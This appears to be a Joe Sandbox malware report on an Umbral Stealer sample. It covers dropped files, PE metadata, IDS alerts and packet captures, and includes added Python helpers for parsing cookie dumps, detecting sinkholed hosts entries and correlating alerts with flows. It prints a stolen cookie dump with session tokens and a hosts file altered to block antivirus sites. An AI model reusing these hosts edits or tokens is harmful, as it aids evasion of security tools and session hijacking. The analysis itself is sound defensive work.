                                                SHA-256:F83845E19588E562D12A78519CEF348D54D47ED2E88567F52EE8B8042E1F7124
                                                SHA-512:20A4AB9BA43981178452AA6B35C74D03E62C3012690651C06C3D9FCC592866E68434658F9719296BD9BC66FAC813381933490569B67B622B39732CD40CE4A241
                                                Malicious:false
                                                Preview:PK.........M.Y{..........#...Browsers\Cookies\Chrome Cookies.txt.WK....].).#..n....E/x..m.~oZ.....<..5.o..3.$Rn..,....:u..9_...}.......=s.b{.. ...$@.H.Bn2.9...x..<.....S...w].E..'.E..3.[,d....'....i......P...,t.6_Xw2n..>...Y+...sgK.q.n..l.....z...?W.t......e.y.[.'~~.d1`...m....p;h.(......yY?...<.......E.!2......{R...Z^.'.R..2o..+.yya....}.g|.....e.!.....[.R.....s.gx......Ft..].....U.@..7..e.M....~`1=.l...,ca.4..c..C2./.W....8...P<..E..I..7|^'Q......B<,...EM-.u...3......OfS...)..v..H....V9..i.AkZ........).B.n.:....J~...%).....v...v....mJ.:..X..#v...0.mP#..2.#G.,.z.c..S]E.... .......k..e06s.5.[...2x.,.pYO...,..4:..f..>.y..!.YO."...E..A"..v:..&Hr...#...g.O..x1.b.$.#.}...f.&KYD.H.,.Y..7..g-....(c..+.1"4.......~.#H...._}../. B |Z..O...HTB..P.@.-..^..`@;.......v~A.E.b......I..>..I.n.Yx\...q.....'%.".-6..?H.EB..".9?y.NU.!QR...)".h.....E..P.g........1z..2S.Ii..... .c.>#03.....JI...b@.eV..C....\.Y...E..v.....%j.^.x.l..V.{z.........f?..3Z....
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3345
                                                Entropy (8bit):5.8601905602672835
                                                Encrypted:false
                                                SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:NFFRiNEUd7
                                                MD5:A3E0FD5B00C49B355B00B3083DA7C5CB
                                                SHA1:A809B694054810FE687456F187E5FC2C2CEFA507
                                                SHA-256:592564F2EB5C54230CC985CDAB59C4AFD497EA11DC922CC72DF20172556B1354
                                                SHA-512:EEB56A85B9200B40F5CBFD0CFEEA2F1E70B1C56F775EE186C5030B6E494C3F72614B8E728AF45BADA3216D74F45CD84FBAF000026A786F92235741D260C13A24
                                                Malicious:false
                                                Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f
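The cookie file above is a Netscape-style tab-separated dump (domain, include-subdomains flag, path, secure flag, expiry, name, value; the report preview prints each tab as `.`), but its expiry field is not a Unix timestamp: 13356618603686193 read as seconds would be hundreds of millions of years out, while read as Chrome's `expires_utc` convention, microseconds since 1601-01-01 UTC, it lands in April 2024. The parser below is an added example, not code from the report or from the malware. SAMPLE_DUMP is constructed from the preview with tabs restored and the cookie values shortened to placeholders; `to_utc()` accepts both conventions, and the `#HttpOnly_` prefix handling goes beyond this dump (it is the curl/wget convention for the same file format).

```python
"""Parse a Netscape-style cookie dump whose expiry field may be Chrome's
microseconds-since-1601 rather than Unix seconds.

Added example, not part of the Joe Sandbox report. SAMPLE_DUMP is constructed
from the report's preview; cookie values are shortened placeholders.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# No plausible Unix-seconds expiry reaches 10**11 (year ~5138); anything larger
# is treated as WebKit/Chrome microseconds since 1601.
WEBKIT_THRESHOLD = 10**11

SAMPLE_DUMP = (
    ".google.com\tTRUE\t/\tFALSE\t13356618603686193\tNID\t511=j8SQUTltnVU5cOAeyzq...\r\n"
    "support.microsoft.com\tTRUE\t/\tTRUE\t13340887435186329\t.AspNetCore.AuthProvider\tTrue\r\n"
    "support.microsoft.com\tTRUE\t/signin-oidc\tTRUE\t13340887735359381\t.AspNetCore.Correlation.mdRqPJ...\tN\r\n"
    # Constructed curl/wget-style line with a plain Unix expiry (2025-01-01T00:00:00Z).
    "#HttpOnly_.example.test\tTRUE\t/\tTRUE\t1735689600\tsid\tplaceholder\r\n"
)


@dataclass
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: Optional[datetime]   # None = session cookie (expiry 0)
    name: str
    value: str
    http_only: bool = False


def to_utc(expiry: int) -> Optional[datetime]:
    """Convert an expiry field to an aware UTC datetime, whichever epoch it uses."""
    if expiry == 0:
        return None
    if expiry >= WEBKIT_THRESHOLD:
        return WEBKIT_EPOCH + timedelta(microseconds=expiry)
    return datetime.fromtimestamp(expiry, tz=timezone.utc)


def parse_cookie_dump(text: str):
    cookies = []
    for line in text.splitlines():
        http_only = line.startswith("#HttpOnly_")
        if http_only:
            line = line[len("#HttpOnly_"):]
        if not line.strip() or line.startswith("#"):   # blank or comment line
            continue
        parts = line.split("\t", 6)                     # value may itself contain tabs
        if len(parts) != 7:
            continue
        domain, subs, path, secure, expiry, name, value = parts
        cookies.append(Cookie(domain, subs == "TRUE", path, secure == "TRUE",
                              to_utc(int(expiry)), name, value, http_only))
    return cookies


def live_cookies(cookies, at: datetime):
    """Cookies still valid at `at`; session cookies count as live."""
    return [c for c in cookies if c.expires is None or c.expires > at]


if __name__ == "__main__":
    for c in parse_cookie_dump(SAMPLE_DUMP):
        print(f"{c.domain:<24} {c.name:<40} secure={c.secure!s:<5} expires={c.expires}")
```

For incident scoping, `live_cookies()` evaluated at the time of theft separates sessions the attacker could replay from entries that were already dead when they were exfiltrated.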
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):671218
                                                Entropy (8bit):7.923452668069569
                                                Encrypted:false
                                                SSDEEP:12288:mVeAAv2LReLVHg/7wrGWfpK9ymlC9b8TOYYVJkdTij3q/WJE0Pf:Kv8gReLVHY7y3fU95li90Tij627f
                                                MD5:B562A2CC6B923F1EFE9C61DAAEBCF70D
                                                SHA1:5F89B1335901F87657823B2AF79D778E79AD6881
                                                SHA-256:07CB1944AD2C7E58679439A802650173CEA4657B280DEC88B0882EE5FE964019
                                                SHA-512:5A22E50E86E1C2DD974B6027D53556D80C7F9EE6A426888971E80F6A442830E195E66BFB493C496090545608349A77CAC1E914C66725214E3756518ED86748BC
                                                Malicious:false
                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G....y....;.5.....U.=3...o.Q..y.$. <T.].AB./...$......G.".t.H.. &.....#..2w.#..Z...."..<.B.Y_...s..i.<>....s..Q......I.......Y0./.O.....>.h?.oBf*..{M..8.9f....I..>\`..4.......|..E1..'..8|.J....b.....t....a.c..{..#.9.G....s.M..G...../...i.Y$...(f......;.J......{n_4.w..2.....n.G....e..".......`.m......y.M......?...7-....l(..3.{C.7.....7.E.}..-.........^?.........z..}.[....u...k..~m;.Z.z.y.5s...._3..;..J..^.V....1...3/....|......X...k...zE.$s..i....9.=39?{H....xf.K.Y...../+h=s..ml.K.N...g.|i.}.%..bU...[y.e%........r.0..{..if.KRw..Sg.......cZ...W.tyZ.kV.q%.\...<..}a....t.Y_F....c.!.+..8../...zv...{}...ml......s..k.W..........2......f.:?u.<..5../.V.;{.[.V..b......H.......?...(....3..{>s.....\.{...9..|f.s........3.0..........]...|n...2_.[...b...n.c.+w....t.{.W...s;..y.z.N.n.....s...q.@n.n.w.c^.....Y....%.Z}..EN..3V.
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.8553638852307782
                                                Encrypted:false
                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                Category:dropped
                                                Size (bytes):49152
                                                Entropy (8bit):0.8180424350137764
                                                Encrypted:false
                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
Eleven further files dropped by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe are byte-identical to the entry above (ASCII text, 60 bytes, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, content "# PowerShell test file to determine AppLocker lockdown mode", Malicious:false) and are not repeated here. PowerShell writes one such probe file at start-up to test whether AppLocker policy forces constrained language mode; twelve copies reflect twelve powershell.exe launches by the sample, not malicious content in the files themselves.
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                Category:dropped
                                                Size (bytes):28672
                                                Entropy (8bit):2.5793180405395284
                                                Encrypted:false
                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                Malicious:false
Preview:SQLite format 3......@ ..........j..........g...$...... (the rest of the preview is non-printable bytes, rendered as dots)
                                                Process:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                File Type:ASCII text, with CRLF, LF line terminators
                                                Category:dropped
                                                Size (bytes):2223
                                                Entropy (8bit):4.573013811987098
                                                Encrypted:false
                                                SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                Malicious:true
Preview (line breaks rendered as dots in the original; the preview is truncated at the end):
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1 localhost
#	::1 localhost

0.0.0.0 virustotal.com
0.0.0.0 www.virustotal.com
0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 totalav.com
0.0.0.0 www.totalav.com
0.0.0.0 scanguard.com
0.0.0.0 www.
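Added check, not part of the Joe Sandbox report or of the sample: a small parser that reads a Windows hosts file and flags every name (other than localhost) that has been pointed at 0.0.0.0 or a loopback address, which is how this stealer blocks the AV vendor sites listed in the dropped file above. SAMPLE_HOSTS is a constructed copy of the preview (only the vendor domains visible there), and VENDOR_HINTS, parse_hosts and find_sinkholed are names chosen for this example.

```python
import ipaddress

# Constructed sample in the layout of the dropped hosts file shown above:
# Microsoft's stock comment header (CRLF), then the appended 0.0.0.0 lines (LF).
# Only the vendor domains visible in the report preview are reproduced.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\r\n"
    "#\r\n"
    "# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n"
    "#\r\n"
    "# localhost name resolution is handled within DNS itself.\r\n"
    "#\t127.0.0.1       localhost\r\n"
    "#\t::1             localhost\r\n"
    "\n"
    "0.0.0.0 virustotal.com\n"
    "0.0.0.0 www.virustotal.com\n"
    "0.0.0.0 avast.com\n"
    "0.0.0.0 www.avast.com\n"
    "0.0.0.0 totalav.com\n"
    "0.0.0.0 www.totalav.com\n"
    "0.0.0.0 scanguard.com\n"
)

# Substrings of security-vendor domains. These four are the ones visible in the
# report preview; a real deployment would carry a fuller list (assumption).
VENDOR_HINTS = ("virustotal", "avast", "totalav", "scanguard")


def parse_hosts(text):
    """Return (ip, hostname, line_no) for every active mapping.

    Comment text after '#' and blank lines are skipped, mirroring what the
    Windows resolver does with the file.
    """
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address; the resolver ignores it too
        for host in fields[1:]:
            entries.append((ip, host.lower(), line_no))
    return entries


def find_sinkholed(text):
    """Hostnames (other than localhost) mapped to an unspecified or loopback address."""
    flagged = []
    for ip, host, line_no in parse_hosts(text):
        if host in ("localhost", "localhost.localdomain"):
            continue
        if ip.is_unspecified or ip.is_loopback:
            flagged.append({
                "host": host,
                "ip": str(ip),
                "line": line_no,
                "vendor": any(hint in host for hint in VENDOR_HINTS),
            })
    return flagged


if __name__ == "__main__":
    for hit in find_sinkholed(SAMPLE_HOSTS):
        tag = "VENDOR" if hit["vendor"] else "other"
        print(f"line {hit['line']:>3}: {hit['host']} -> {hit['ip']} [{tag}]")
```

Any non-localhost name sent to 0.0.0.0 or 127.0.0.1 is worth a look on its own; the vendor tag only prioritises hits. On a live host, read C:\Windows\System32\drivers\etc\hosts into find_sinkholed instead of SAMPLE_HOSTS.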
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.020784348942329
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:zamPeEkHWr.exe
                                                File size:232'448 bytes
                                                MD5:ef323a7483653ffb1fc4ff036576e065
                                                SHA1:80e63b57a7ad6394f778c7aa5a855520f1533589
                                                SHA256:824d0e2ebaa40b7bca3bc0657338a13df78121172fe52e604f45c8033ab7537a
                                                SHA512:04785049f73acbacc2b0ea89e2bbc547ac6fa302eac4cbbd895f8d6a873c8b0dcfa8a8762d90847c9a0bf28862e12b294cb70f073019a6046bac104b9189ba7e
                                                SSDEEP:6144:eloZM3fsXtioRkts/cnnK6cMluDdCFzQEb0CzFQMpnhb8e1msQci:IoZ1tlRk83MluDdCFzQEb0CzFQMpZ3K
                                                TLSH:E5346B4933B88B17E25F8BBDD5B1548F87B1F143E90AF7CE0C8895E82421B42E949E57
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x43a1ee
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(the remaining disassembled bytes are zero padding, decoded as a run of add byte ptr [eax], al)
This single jump is the standard native stub of a .NET executable: 0x402000 is the one IAT slot at RVA 0x2000 (IMAGE_DIRECTORY_ENTRY_IAT, size 0x8), which resolves to the only import, mscoree.dll!_CorExeMain, and hands control to the CLR. The sample's logic lives in the managed code, so this native disassembly says nothing about its behaviour.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3a19c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c000          0x550         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3a180          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x381f4       0x38200   057ad300337fa0180fe5580905656531  False     0.3940788557906459  data       6.036556243081606    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x3c000          0x550         0x600     962661cf515c57234d66775c661dfade  False     0.4134114583333333  data       4.575008625258809    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x3e000          0xc           0x200     4aaa7e975e1a908d2684e1f48bb6854b  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x3c0a0  0x2c4  data                                                                                                 0.4449152542372881
RT_MANIFEST  0x3c364  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        Protocol  SID      Signature                                                      Source Port  Dest Port  Source IP    Dest IP
2024-08-05T15:44:50.851858+0200  TCP       2045593  ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)  49740        443        192.168.2.4  162.159.138.232
2024-08-05T15:44:27.256131+0200  TCP       2803305  ETPRO MALWARE Common Downloader Header Pattern H              49738        80         192.168.2.4  208.95.112.1
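Added example, not code from the report or the sample: it reconstructs conversations from the TCP packet listing that follows and ties each Suricata alert above to the connection it fired on, which is the first thing to establish before pulling the exfil POST out of a pcap. PACKETS is a constructed subset of the page's rows (the 49738 and 49740 connections only), ALERTS re-keys the two alerts above, and parse_packets, summarize_flows and correlate are names chosen for this example.

```python
import re
from datetime import datetime

# Constructed sample in the layout of the report's TCP packet listing. The rows are a
# hand-picked subset of the connections on this page (49738 -> 208.95.112.1:80 and
# 49740 -> 162.159.138.232:443), not the full capture.
PACKETS = """\
Aug 5, 2024 15:44:26.748496056 CEST  49738  80     192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:26.755994081 CEST  80     49738  208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:27.256130934 CEST  49738  80     192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:50.105669975 CEST  49740  443    192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.105722904 CEST  443    49740  162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.851871014 CEST  443    49740  162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.852655888 CEST  49740  443    192.168.2.4      162.159.138.232
"""

# The two IDS alerts from the report: (timestamp, sid, signature, sport, dport, src, dst).
ALERTS = [
    ("2024-08-05T15:44:50.851858+0200", 2045593,
     "ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)",
     49740, 443, "192.168.2.4", "162.159.138.232"),
    ("2024-08-05T15:44:27.256131+0200", 2803305,
     "ETPRO MALWARE Common Downloader Header Pattern H",
     49738, 80, "192.168.2.4", "208.95.112.1"),
]

# One row of the listing: "Mon D, YYYY HH:MM:SS.nnnnnnnnn CEST  sport  dport  src  dst".
ROW = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{9}) CEST\s+"
                 r"(\d+)\s+(\d+)\s+(\S+)\s+(\S+)$")


def parse_packets(text):
    """(timestamp, sport, dport, src, dst) per row; nanoseconds truncated to microseconds."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # header or malformed line
        ts = datetime.strptime(f"{m.group(1)}.{m.group(2)[:6]}", "%b %d, %Y %H:%M:%S.%f")
        rows.append((ts, int(m.group(3)), int(m.group(4)), m.group(5), m.group(6)))
    return rows


def summarize_flows(rows):
    """Group packets into conversations keyed (client_ip, client_port, server_ip, server_port).

    The endpoint that sent the first packet seen is taken as the client; each
    conversation records first/last timestamp and packet counts per direction.
    """
    flows = {}
    for ts, sport, dport, src, dst in sorted(rows, key=lambda r: r[0]):
        fwd, rev = (src, sport, dst, dport), (dst, dport, src, sport)
        if rev in flows:
            key, direction = rev, "s2c"
        else:
            key, direction = fwd, "c2s"
            flows.setdefault(key, {"first": ts, "last": ts, "c2s": 0, "s2c": 0})
        flows[key][direction] += 1
        flows[key]["last"] = max(flows[key]["last"], ts)
    return flows


def correlate(flows, alerts):
    """Map each alert SID to the conversation it fired on (None if no packets match)."""
    out = {}
    for _, sid, _, sport, dport, src, dst in alerts:
        candidates = ((src, sport, dst, dport), (dst, dport, src, sport))
        out[sid] = next((k for k in candidates if k in flows), None)
    return out


if __name__ == "__main__":
    flows = summarize_flows(parse_packets(PACKETS))
    for key, f in flows.items():
        dur = (f["last"] - f["first"]).total_seconds()
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  c2s={f['c2s']} s2c={f['s2c']}  {dur:.3f}s")
    for sid, key in correlate(flows, ALERTS).items():
        print(f"SID {sid} -> {key}")
```

Applied to the full listing, the 2045593 alert lands on the 49740 -> 162.159.138.232:443 conversation, whose first packet is at 15:44:50.105 and which is immediately followed by a second TLS connection on port 49741; the 2803305 alert lands on 49738 -> 208.95.112.1:80.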
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Aug 5, 2024 15:43:49.060046911 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:43:49.064918041 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 5, 2024 15:43:49.065156937 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:43:49.065330029 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:43:49.070539951 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 5, 2024 15:43:49.522703886 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 5, 2024 15:43:49.563059092 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:26.748496056 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:26.755994081 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:26.756336927 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:26.756620884 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:26.761522055 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:27.241185904 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:27.256130934 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:27.261534929 CEST  80           49738      208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:27.263751030 CEST  49738        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:28.785027981 CEST  80           49731      208.95.112.1     192.168.2.4
Aug 5, 2024 15:44:28.785131931 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:50.105669975 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.105722904 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.105781078 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.106453896 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.106468916 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.570710897 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.570867062 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.576987982 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.577013016 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.577311039 CEST  443          49740      162.159.138.232  192.168.2.4
Aug 5, 2024 15:44:50.588633060 CEST  49740        443        192.168.2.4      162.159.138.232
Aug 5, 2024 15:44:50.588875055 CEST  49731        80         192.168.2.4      208.95.112.1
Aug 5, 2024 15:44:50.595911026 CEST  80           49731      208.95.112.1     192.168.2.4
